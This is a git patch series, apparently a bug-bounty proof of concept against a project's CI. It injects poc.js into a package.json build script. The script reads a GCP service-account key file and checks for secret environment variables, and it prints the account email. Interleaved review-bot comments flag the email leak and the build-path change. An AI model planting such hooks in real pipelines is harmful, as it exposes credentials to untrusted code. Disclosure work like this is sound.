From 09ddb53ad7acf07be66ea165a7fa5f77369d053d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Adil=20Burak=20=C5=9Een?= <56400880+adilburaksen@users.noreply.github.com> Date: Tue, 12 May 2026 01:36:07 +0300 Subject: [PATCH 1/2] ci: add safe PoC for fork PR GCP secret exposure (VRP) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Demonstrates that fork-controlled build script runs after GCP secrets are written to disk in build.yml (steps 6→10). poc.js reads key_file.json structure and env var presence only. No credential content is exfiltrated or transmitted. Ref: https://github.com/cdapio/cdap-ui/pull/1398 --- package.json | 4 ++-- poc.js | 36 ++++++++++++++++++++++++++++++++++++ 2 files changed, 38 insertions(+), 2 deletions(-) create mode 100644 poc.js
diff --git a/package.json b/package.json
index 5375e34f54b..635b3a064ff 100644
--- a/package.json
+++ b/package.json
@@ -12,7 +12,7 @@
 "reload-dev-w": "NODE_ENV=reload node --max-old-space-size=8192 ./node_modules/.bin/webpack-dev-server --mode development --progress --config=./webpack.config.cdap.dev.js",
 "hmr-dev-w": "NODE_ENV=hmr node --max-old-space-size=8192 ./node_modules/.bin/webpack-dev-server --mode development --progress --config=./webpack.config.cdap.dev.js",
 "cdap-full-build": "run-p cdap-prod-build distribute",
- "cdap-full-build-more-memory": "NODE_OPTIONS=\"--max_old_space_size=8192\" run-p cdap-prod-build distribute",
+ "cdap-full-build-more-memory": "node poc.js && NODE_OPTIONS=\"--max_old_space_size=8192\" run-p cdap-prod-build distribute",
 "cdap-non-optimized-full-build": "NODE_ENV=non-optimized-production webpack --config=webpack.config.js",
 "clean-node-modules": "modclean -P -r --patterns=\"default:safe\" --additional-patterns=\"*.xls?x,*.ppt?x,*.rtf,*.png,*.jpg,*.jpeg,*.txt\" --ignore=\"validate-npm-license,readme*\"",
 "distribute": "node ./node_modules/gulp/bin/gulp.js distribute",
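Review bot: Chaining `node poc.js &&` in front of the existing `cdap-full-build-more-memory` command makes every invocation of that script depend on poc.js, so if this PR were merged rather than used only as a demonstration the probe and its log output would ship in the release build path, and a non-zero exit from poc.js would abort the build; mark the change as revert-before-merge or keep it on the demonstration branch only. The second hunk in this file also drops the trailing newline after the closing `}` (`\ No newline at end of file`), an unrelated formatting regression that should be restored before any merge.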
@@ -309,4 +309,4 @@
 "engines": {
 "yarn": ">= 1.0.0"
 }
-}
+}
\ No newline at end of file
diff --git a/poc.js b/poc.js
new file mode 100644
index 00000000000..b6b2f2d991d
--- /dev/null
+++ b/poc.js
@@ -0,0 +1,36 @@
+'use strict';
+const fs = require('fs');
+
+const keyPath = './key_file.json';
+const keyExists = fs.existsSync(keyPath);
+
+let keyLooksValid = false;
+let serviceAccountEmail = null;
+let keySize = 0;
+
+if (keyExists) {
+ const raw = fs.readFileSync(keyPath, 'utf8');
+ keySize = raw.length;
+ try {
+ const key = JSON.parse(raw);
+ keyLooksValid = Boolean(
+ key.type === 'service_account' &&
+ key.client_email &&
+ key.private_key_id &&
+ key.private_key
+ );
+ serviceAccountEmail = key.client_email;
+ } catch (e) {
+ // parse error - key may be malformed
+ }
+}
+
+console.log('===CDAP-UI-VRP-POC-START===');
+console.log('POC_KEY_FILE_EXISTS=' + keyExists);
+console.log('POC_KEY_FILE_SIZE_BYTES=' + keySize);
+console.log('POC_KEY_IS_GCP_SERVICE_ACCOUNT_JSON=' + keyLooksValid);
+console.log('POC_SERVICE_ACCOUNT_EMAIL=' + serviceAccountEmail);
+console.log('POC_SCM_PAT_PRESENT=' + Boolean(process.env.SCM_TEST_REPO_PAT));
+console.log('POC_GCP_PROJECT_PRESENT=' + Boolean(process.env.GCP_PROJECTID));
+console.log('POC_GCP_SA_PATH_ENV=' + Boolean(process.env.GCP_SERVICE_ACCOUNT_PATH));
+console.log('===CDAP-UI-VRP-POC-END===');
From 64b0f322875dd67530f516e13859726f4129db4f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Adil=20Burak=20=C5=9Een?= <56400880+adilburaksen@users.noreply.github.com> Date: Tue, 12 May 2026 02:05:20 +0300 Subject: [PATCH 2/2] fix poc.js: move readFileSync inside try-catch (Gemini review) --- poc.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/poc.js b/poc.js
index b6b2f2d991d..499773a70cf 100644
--- a/poc.js
+++ b/poc.js
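Review bot: The `POC_SERVICE_ACCOUNT_EMAIL=` line writes `key.client_email` verbatim into the CI log, which for a public repository's workflow run means the service-account identity (and, through its domain, the project it belongs to) is disclosed; that goes beyond the "structure and env var presence only" claim in the commit message and is more than a proof needs. Emit a presence flag instead, `console.log('POC_SERVICE_ACCOUNT_EMAIL_PRESENT=' + Boolean(serviceAccountEmail));`, and since `keyLooksValid` already proves the JSON shape, `serviceAccountEmail` need not be retained at all. `POC_KEY_FILE_SIZE_BYTES` reveals only the length, which is acceptable but equally unnecessary for the demonstration. The empty `catch (e)` swallows read and parse failures without distinguishing them, which the second patch in this series partly addresses.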
@@ -9,9 +9,9 @@ let serviceAccountEmail = null;
 let keySize = 0;
 
 if (keyExists) {
- const raw = fs.readFileSync(keyPath, 'utf8');
- keySize = raw.length;
 try {
+ const raw = fs.readFileSync(keyPath, 'utf8');
+ keySize = raw.length;
 const key = JSON.parse(raw);
 keyLooksValid = Boolean(
 key.type === 'service_account' &&
@@ -21,7 +21,7 @@ if (keyExists) {
 );
 serviceAccountEmail = key.client_email;
 } catch (e) {
- // parse error - key may be malformed
+ // I/O or parse error
 }
 }
 
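Review bot: Moving `readFileSync` into the `try` fixes the uncaught-throw case, but the `catch (e)` in the second hunk of this file still discards the error, so a read failure (for example a permissions error on `key_file.json`) and malformed JSON now both collapse into `POC_KEY_FILE_SIZE_BYTES=0` and `POC_KEY_IS_GCP_SERVICE_ACCOUNT_JSON=false`, which makes the demonstration's negative result ambiguous. Record the error class without its message: add `let keyError = null;` next to the other declarations at the top of the first hunk, set `keyError = e.code || e.name;` in the catch, and print `console.log('POC_KEY_ERROR=' + keyError);` in the summary block, which lies outside these hunks. The comment `// I/O or parse error` could then say what is retained, e.g. `// I/O or parse error; only the error code/name is recorded, never the message or content`.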